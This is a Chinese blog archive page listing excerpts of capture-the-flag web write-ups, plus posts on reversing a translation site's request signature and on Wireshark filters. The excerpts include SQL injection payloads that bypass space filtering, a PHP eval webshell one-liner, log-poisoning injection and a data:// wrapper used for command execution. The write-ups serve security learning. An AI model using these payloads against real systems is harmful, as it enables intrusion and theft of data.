04 2024 档案

摘要:首先找到这个请求接口 这个接口就是我们请求翻译的接口 发现有个sign值,这就是我们需要逆向的值 再看看这个接口的响应 可以发现这个响应是被加密的,我们还需要去逆向解密这个被加密的响应,这篇就单纯讲一下逆向这个sign值把 查看调用堆栈 下断点,一步步跟栈发现了sign的生成位置 进入这个k函数看看 阅读全文
posted @ 2024-04-21 11:30 WSssSW 阅读(21) 评论(0) 推荐(1) 编辑
摘要:ip 过滤 ip.src_host ip.dst_host ip.addr mac 过滤 eth.src eth.dst eth.addr 端口过滤 tcp.port tcp.srcport tcp.dstport 协议类型过滤 arp dhcp 规则组合 and or 文件导出 导出特定分组 al 阅读全文
posted @ 2024-04-20 10:20 WSssSW 阅读(126) 评论(0) 推荐(0) 编辑
摘要:审计 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a 阅读全文
posted @ 2024-04-07 19:00 WSssSW 阅读(11) 评论(0) 推荐(0) 编辑
摘要:.git源码泄露 发现有后们 flag在上级目录里面 直接Letmein=show_source('../flag.txt');就出来了 阅读全文
posted @ 2024-04-07 11:05 WSssSW 阅读(74) 评论(0) 推荐(0) 编辑
摘要:上来是一段混淆的ob混淆的js代码,还会有个setinterval无限debugger反调试 点击查看代码 function _0x51ba() { const _0x4b06d7 = ['padding:100px\x20120px;\x20font-size:\x200;\x20backgrou 阅读全文
posted @ 2024-04-05 14:40 WSssSW 阅读(35) 评论(0) 推荐(0) 编辑
摘要:上来先代码审计 点击查看代码 <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); } 阅读全文
posted @ 2024-04-05 14:16 WSssSW 阅读(285) 评论(0) 推荐(0) 编辑
摘要:输入c=3就会跳出来这个url 复制并访问,看这个页面应该是sql注入 有注释可看,看看他过滤了哪些东西 点击查看代码 if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygo 阅读全文
posted @ 2024-04-04 21:04 WSssSW 阅读(52) 评论(0) 推荐(0) 编辑
摘要:upload.php.bak源码泄露了 审计一下 点击查看代码 <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_FILES['file' 阅读全文
posted @ 2024-04-04 17:28 WSssSW 阅读(32) 评论(0) 推荐(0) 编辑
摘要:查看源代码有提示 以为是cmd命令解过输入linux命令愣是没反应后来输入phpinfo()才有回显 原来是被误导了。 一开始想的是直接写入一句话木马 点击查看代码 @eval($_POST['attack']);echo 111; //这里的echo 111是方便看我们有没有植入成功的 这里有11 阅读全文
posted @ 2024-04-04 16:03 WSssSW 阅读(62) 评论(0) 推荐(0) 编辑
摘要:代码审计 点击查看代码 <?php function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$ 阅读全文
posted @ 2024-04-04 15:10 WSssSW 阅读(20) 评论(0) 推荐(0) 编辑
摘要:dirsearch没有扫到文件 查看源代码发现 有个style.css文件点击查看 查看index.phps代码 又是代码审计 点击查看代码 <?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from 阅读全文
posted @ 2024-04-04 12:41 WSssSW 阅读(80) 评论(0) 推荐(0) 编辑
摘要:dirsearch 扫到robots文件 查看一下 发现有个index.phps文件 访问这个index.phps,可以下载下来 我们来审计一下这里的代码 <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ 阅读全文
posted @ 2024-04-04 10:13 WSssSW 阅读(97) 评论(0) 推荐(0) 编辑
摘要:?id=10//union//select//1,database(),3//%23查看库名 查看表名 -1/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.table 阅读全文
posted @ 2024-04-03 23:44 WSssSW 阅读(19) 评论(0) 推荐(0) 编辑
摘要:这道题目空格被过滤了,那么我们可以用/**/来替换空格 'union/**/select/**/1,(select/**/database()),3# //查看数据库名名字为web2 查看web2下的表名 'union/**/select/**/1,(select/**/group_concat(t 阅读全文
posted @ 2024-04-03 23:02 WSssSW 阅读(91) 评论(0) 推荐(0) 编辑
摘要:这题和第三题有点不一样,这题的把php 和 data 都过滤掉了 一旦我们输入这个关键字就页面就会报error 一开始是没啥头绪的,后面上网查了一下,可以通过日志记录来注入代码 对于Apache,日志存放路径:/var/log/apache/access.log 对于Ngnix,日志存放路径:/va 阅读全文
posted @ 2024-04-03 20:57 WSssSW 阅读(181) 评论(0) 推荐(1) 编辑
摘要:这题一看就知道是个伪协议的题 直接用data伪协议 ls 查看目录 data://text/plainy, 再cat 一下就拿到flag了 阅读全文
posted @ 2024-04-03 19:53 WSssSW 阅读(21) 评论(0) 推荐(0) 编辑
摘要:第一题很简单 就是一个base64编码 我们打开开发者模式看源代码 Y3Rmc2hvd3s1MGMyZDdkYS1lOWZjLTQ5YzItYTRjZC1iZmJmZjIyYmI4NWV9将这段话base64解码就拿到flag了 阅读全文
posted @ 2024-04-03 19:34 WSssSW 阅读(10) 评论(0) 推荐(0) 编辑
摘要:这题是考sql注入,我们先用个万能语句注入 发现它上面会出现 欢迎你,ctfshow 那么这就很明显了,这个用户的名字就是ctfshow 那么猜测flag会不会是在flag的用户里面呢我们提交一下 如果有flag的用户的话他的 欢迎你,ctfshow 会变成 欢迎你,flag但是很明显没有 尝试这个 阅读全文
posted @ 2024-04-03 19:34 WSssSW 阅读(72) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示